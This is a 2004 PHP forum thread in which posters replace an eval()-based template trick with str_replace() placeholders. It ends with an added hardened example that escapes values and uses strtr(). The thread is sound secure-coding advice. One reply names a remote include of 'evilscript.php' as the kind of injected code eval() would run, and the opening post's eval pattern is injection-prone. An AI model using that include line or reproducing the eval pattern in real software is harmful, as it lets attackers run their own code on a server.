(PHP) Messin' with eval()

  • rtm223

Post July 1st, 2004, 8:01 am

ok well I was messing around with eval and came up with this idea:

PHP Code:
<?php
$string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   eval('echo("'.$string.'");');
}
?>


The idea being that I could write a block of html, and just put in variable names arbitrarily, using the single quotes to not expand the values straight away (because they have not been set :roll: ), or read from a file or db or whatever. Then later expand the variables (using that eval/echo thing) from an array, or different db value (I haven't really thought through how to use it lol).

What I really want to know is has PHP got anything built in to do this sort of thing, or am I just making things more complicated than they need to be? The output can be seen here BTW

  • rjstephens

Post July 1st, 2004, 8:06 pm

rtm, what is wrong with this:
PHP Code:
<?php
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   // Inside single quotes only \' and \\ are escapes, so the double quotes are written plainly.
   echo 'this is the '.$index.'th element. It\'s value is "'.$value.'" <br />';
}
?>


or am I missing the point now?

Anyway, it is a good idea to avoid eval() at all costs because it is very easy for your visitors to insert php code into your script (i.e. include('http://domain.com/evilscript.php');, which would be included as if it were from your server).
  • rtm223

Post July 2nd, 2004, 12:07 am

well the point was to keep the string OUTSIDE of the loop for easy editing and customisation. You don't have to sift through the code to alter little bits.

And I thought about the eval situation, but the string would probably be hard-coded into the script. If someone can alter the script, I don't think it matters if I am using eval() or not :P lol. I thought of a useful use also, I'll write an eg when I get to work.
  • rjstephens

Post July 2nd, 2004, 12:52 am

rtm, the security risk depends on whether or not any of the variables in the eval come from user input. If they do, you have a security risk (unless you are VERY careful to properly escape them and such).

If your motivation is easy editing, then do something like this:
PHP Code:
<?php
// Inside single quotes only \' and \\ are escapes, so the double quotes are written plainly.
$string = 'this is the [INDEX]th element. It\'s value is "[VALUE]" <br />';
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
    echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
}
?>
  • rtm223

Post July 2nd, 2004, 1:09 am

rjstephens wrote:
rtm, the security risk depends on whether or not any of the variables in the eval come from user input.


*slaps self.

Thank you rjstephens, that makes an awful lot more sense, I didn't think this through very well. I'll just do it with a preg_replace() on all of the vars.

Thanks for pointing out the error of my ways :lol:

//edit, not preg_replace, because str_replace can take arrays:

PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);

foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>


Thanks again RJ, can't believe I didn't think of that. I think I'll just stick to never using eval() in PHP. Ever.

Now all I need to do is find a use for the code :roll:
  • rjstephens

Post July 2nd, 2004, 2:07 am

rtm223 wrote:
*snip*
PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");
 
$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);
 
foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>

*snip*


RTM, now I'm slapping myself, I should have thought of that.

//edit
while we're making the code as simple as possible, why not
PHP Code:
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   echo(str_replace(
         array(
            "[INDEX]",
            "[VALUE]"
         ),
         array(
            $index,
            $value
         ),
         $string
      )
   );
}
?>

of course, without all the tabs
  • rtm223

Post July 2nd, 2004, 3:02 am

Noooo, I say keep the tabs. No tabs does my head in lol. It's easier to make sure that the elements match in case you are a dufus like me. It looks kinda ugly if you take out the whitespace:
PHP Code:
echo(str_replace(array("[INDEX]","[VALUE]"),array($index,$value),$string));

I think that would start looking quite nasty with more than a couple of vars.... Maybe a compromise lol:
PHP Code:
$string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");

foreach($myArray as $index => $value){
   echo(str_replace(
      array("[INDEX]","[VALUE]"),
      array( $index  , $value),
      $string)
   );
}

is looking nice and neat to me :D
Thanks again rjstephens.

//edit
ooooh, without the eval it is really easy to insert functions or strings with variables inside, as well as just plain old variables.... This is all looking extremely handy to me :)
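
Added example, not code from any poster in this thread: the eval()-free placeholder approach the thread settles on, hardened for values that may come from user input. The helper name render_template(), the placeholder-name rule and the sample values are assumptions made for illustration. It goes slightly beyond the thread by HTML-escaping each value and by using strtr(), which substitutes in a single pass.

```php
<?php
// Added example. render_template() is a hypothetical helper, not from the thread.

/**
 * Replace [NAME] placeholders in $template with HTML-escaped values.
 * The template is only ever treated as text; nothing in it or in the
 * values is parsed as PHP, which is what eval() would do.
 */
function render_template(string $template, array $vars): string
{
    $pairs = [];
    foreach ($vars as $name => $value) {
        // Accept only simple upper-case placeholder names (assumed convention).
        if (!preg_match('/^[A-Z_][A-Z0-9_]*$/', (string) $name)) {
            throw new InvalidArgumentException("bad placeholder name: $name");
        }
        // Values land in HTML output, so escape markup characters.
        $pairs["[$name]"] = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
    // strtr() makes one pass over the template: text that arrives inside a
    // value is never scanned again for further placeholders.
    return strtr($template, $pairs);
}

$template = "this is the [INDEX]th element. Its value is '[VALUE]' <br />\n";

// Constructed sample data: the last three entries stand in for user input
// containing markup, PHP-style variable syntax and a placeholder token.
$myArray = ["damn", "cool", '<b>bold</b>', '{$index}', '[INDEX]'];

foreach ($myArray as $index => $value) {
    echo render_template($template, ['INDEX' => $index, 'VALUE' => $value]);
}

// Contrast: str_replace() with arrays applies the search terms in order, so
// text inserted by an earlier replacement can be rewritten by a later one.
// strtr() with the same pairs leaves inserted text alone.
$untrusted = '[VALUE]';
echo str_replace(['[INDEX]', '[VALUE]'], [$untrusted, 'second'], "[INDEX]\n");
echo strtr("[INDEX]\n", ['[INDEX]' => $untrusted, '[VALUE]' => 'second']);
```

Running the script shows the markup, the `{$index}` text and the `[INDEX]` token coming out as inert, escaped text, and the last two lines show where str_replace() and strtr() diverge.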